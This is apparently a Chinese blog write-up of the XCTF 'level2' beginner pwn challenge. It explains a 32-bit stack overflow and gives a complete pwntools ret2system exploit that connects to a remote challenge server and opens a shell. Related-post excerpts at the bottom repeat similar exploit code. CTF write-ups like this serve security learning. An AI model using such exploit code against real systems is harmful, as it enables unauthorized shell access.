攻防世界 pwn新手 level2

最新推荐文章于 2024-09-23 20:53:41 发布
最新推荐文章于 2024-09-23 20:53:41 发布
阅读量528 收藏 3
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kwist_jay/article/details/106749836
版权

这里我们先下载附件,查看一下文件信息:

32位的i386程序,没有开canary,推测可以使用栈溢出,这里我们用IDA32打开,查看main函数的伪代码

顺藤摸瓜找到输入点buf:

这里我们查看buf的栈结构,他只用了0x88字节但是给了100字节的输入空间,明显的栈溢出

最后两位的返回值s是一个4字节的数组,r为程序返回的地址,就是我们要操作的东西

初步的payload可以定为  'a'*0x88+'aaaa'+.....

我们再往下看,做pwn一般就是找到system函数然后运行自己的命令,所以我们找到了_system函数,地址为:

system=0x08048320.这是第一步,其次我们找找到我们可以调用的参数,如下:

bin_sh=0x0804A024

但还有一点要注意的是:

preview

所以我们在插入参数前要首先覆盖掉函数返回地址这一部分。

这里我们的payload就构造完成了:

payload='a'*0x88+'aaaa'+p32(system)+p32(0)+p32(bin_sh)

整体代码为:

from pwn import *

p = remote('220.249.52.133',30056)

system=0x08048320

bin_sh=0x0804A024

p.sendline('a'*0x88+'aaaa'+ p32(system)+p32(0)+p32(bin_sh))

p.interactive()

运行结果如下:

kwist_jay
关注
攻防世界(pwn篇)---level2
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-15 1644
攻防世界(pwn篇)—level2 文章目录攻防世界(pwn篇)---level2题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 运行分析 IDA 分析 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF system("echo
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1769
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
攻防世界 - pwn - level2
qq726232111的博客
03-16 264
A、程序分析 1、使用了system() 2、read() -> 缓冲溢出 3、 程序包含/bin/sh命令 B、利用分析 1、read(0,ebp-88h) --> payload ebp-88h --- ebp-1h (88hbyte 填充数据) ebp --- ebp+3h (4byte 填充...
攻防世界PWN-level2
Deeeelete的博客
11-13 1048
题目:level2 开PE看信息,进checksec看详情 进checksec,查看到程序无PIE,堆栈不可执行,无栈保护 跑一遍逻辑,还是hello word 于是开32位IDA查看 f5main函数 看源码,主要就是echo了一个hello world,同时很明显上方有一个显眼的脆弱函数 双击进入脆弱函数查看 单独摘出源码 ssize_t vulnerable_function() { char buf; // [sp+0h] [bp-88h]@1 system("ec
攻防世界pwn pwn_level2
qq_44370676的博客
08-14 376
首先下下来的文件查壳以及查保护机制
攻防世界PWN新手题(PWN——level2)
0pt1mus
12-20 946
level2 转载自原创superj.site 0x00 首先通过file和checksec分析该题的附件。 判断该文件是32位的ELF文件,只开启了不可执行的保护。 0x01 开始进行反汇编,用IDA 32位。 通过左侧的函数窗口发现,只有main、vulnerable_function可用,因此进行分析,两个函数如下图: 通过分析发现,在main函数中首先调用vulnerable_fun...
攻防世界pwn新手整理
Lenard404的博客
08-19 3313
小白尝试做pwn题QAQ get shell 惯例: IDA查看main函数: 显然直接连接就可以得到权限。 nc ls cat 一条龙服务: 菜鸟教程的Linux命令大全 hello pwn 惯例: IDA查看main: 查看if语句后的函数: 目的明确:进入if语句。 计算60106C和601068的偏移为4,read可以读入0x10,直接输入条件即可。 exp: from pwn import* r = remote('111.200.241.244',64067) payload = '
攻防世界pwn新手练习(level2
BurYiA的博客
12-24 766
level2 可以看到题上已经有提示了(ROP) 我们看一下程序的保护状态和它的运行情况 开了NX,问题不大。运行可以发现有一个输入点 放IDA里看看 在字符串窗口可以发现有system和**/bin/sh** 这就很舒服了呀,再结合一下题目给的提示,构造ROP链就行 1 1 ...
攻防世界pwn新手练习——level0
smsyz2019的博客
10-31 1723
这是一个简单的利用栈溢出漏洞进行简单的ROP 下载附件,将程序放进虚拟机中 拿到程序首先检查程序开启了什么保护,输入 checksec 程序名称 checksec level0 可以看到这是一个64位程序,只开启了NX保护。NX保护简单来说就是代码不可执行。 例如你向栈上输入一段shellcode,那么NX保护就是防止这个shellcode的执行。 具体内容和其他的程序保护可以参考这个博客。l...
攻防世界 pwn 新手练习 level2
ChaoYue_miku的博客
07-05 989
题目描述:菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ ** 0、使用file命令查看文件类型,使用checksec查看保护情况,尝试打开文件 ** 32位ELF文件,开启了NX保护和部分地址随机化 (其实checksec就有包含了file的功能) ** 1、使用IDA32 Pro打开文件 ** 题目描述中有提示:面向返回的编程(ROP),所以就要寻找并构造ROP链。 首先查看main()函数 发现有一个vulnerable_function()函数,点进去看一下
攻防世界 Pwn level2
MrTreebook的博客
07-16 590
攻防世界pwn level2 1.file 和 checksec 先走一遍 是一个32位的文件 看到 RELRO的状态是 Partial 2.放进IDA32看一下 有一个system函数 进入vulnerable_function看一下 buf可以溢出 进入栈空间看看 136byte的buf再加上4byte的数据溢出返回system的地址 本题开始前就提示我们用ROP 现在去plt表上暴露system的地址 3.编写exp 先构造paylod system_plt = elf.plt["syst
[攻防世界 pwn]——level2
Y_peak的博客
02-18 324
[攻防世界 pwn]——level2 题目地址: https://adworld.xctf.org.cn/ 题目: 32位程序 IDA中, 找到system和 ‘/bin/sh’ 地址进行覆盖 exploit from pwn import * p = remote("111.200.241.244",55083) system_addr = 0x0804845C binsh = 0x0804A024 payload = 'a' * (0x88 + 0x4) + p32(system_addr
攻防世界pwn-level2
a_silly_coder的博客
01-14 305
下载文件后,首先查看保护 将文件拖入ida 32位,发现函数名明示了攻击点 点进vulnerable_function函数后,发现buf距离ebp有0x88的距离,但是可以读入0x100的大小,确定这是一道栈溢出的题目,溢出点就在此处。 确定溢出点后,开始寻找利用方式,发现代码中给出了system函数,在0x8048320的位置 随后寻找sh或者bin_sh字符串: 此时要素齐全,开始编写脚本。 设计栈的结构为: 脚本为: 发送脚本,开始攻击: ...
攻防世界_pwn_level2(萌新版)
TedLau的博客
02-24 2500
首发于鄙人博客:传送门 0x00 前言 32位,NX enabled 0x10 步骤 0x11 main函数 很明显我们需要去查看vulnerable函数。 0x12 vulnerable函数 在这里我们需要向题目中输入若干内容,又观察到buf的长度为0x88,那么我们便可以构造出0x88长度的无关数据,然后再输入4个长度的垃圾数据以覆盖ebp,然...
【愚公系列】2022年01月 攻防世界-简单题-PWN-002(level2)
热门推荐
时光隧道
01-18 3万+
文章目录一、level2二、答题步骤1.获取在线场景2.查壳3.IDA总结 一、level2 题目链接:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0 二、答题步骤 1.获取在线场景 2.查壳 对下载文件进行查壳,命令如下 file level2 checksec --file=level2 分析文件,小端程序(LSB),栈不可执行。 3.IDA 使用IDA对文件进行反汇编 第一步:首先找到ma
攻防世界level2
weixin_43489686的博客
03-30 356
我这种菜鸡就打打这种签到题刷刷存在感吧。。。 32位,基本没啥保护 简单溢出 system函数地址和/bin/sh地址都有了 直接上exp from pwn import * p = remote('111.198.29.45',55216) bin_sh = 0x804A024 system = 0x8048320 payload = 'a'*0x88+'a'*4+p32(syst...
攻防世界_level2
RMC131的博客
04-10 4410
checksec IDA exp from pwn import * p = remote('111.200.241.244',58154) payload = b'a' * 0x8c + p32(0x08048320) + p32(0) + p32(0x0804A024) p.recvuntil("Input:") p.send(payload) p.interactive() 运行得到flag
攻防世界pwn level2
最新发布
2401_83086823的博客
09-23 393
想要溢出buf,就要0x88-0x00+0x04个字节,溢出部分为实现system函数,system(command)的command为/bin/sh,即可拿到shell.2.system返回值为四个字节,为了堆栈平衡,填上四个垃圾字符,再到/bin/sh地址。进入vulnerable_function(这个名字其实就给了提示)buf大小为0x88,read范围为0x100,存在溢出漏洞。查看字符串,看到了system,/bin/sh.1.buf溢出写入system地址。
攻防世界-pwn新手-level2
CHAWUCIREN1的博客
07-26 325
根据题目提示,这个题需要使用rop 运行一下,再file一下 检查一下保护机制 丢入ida 查看vulnerable_function函数,发现有system,证明plt表有这个数据 可以发现申请0x88的空间,但是却能输入0x100,存在栈溢出 和之前的题目相比,这次没有"/bin/sh"函数 结合题目的提示,我们需要自己构造rop buf为0x88,加四个字节到返回地址ret, 利用gdb打印system的地址 system_addr = 0x8048320 发现有’/bin/sh’ bi.
攻防世界pwn新手题答案
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值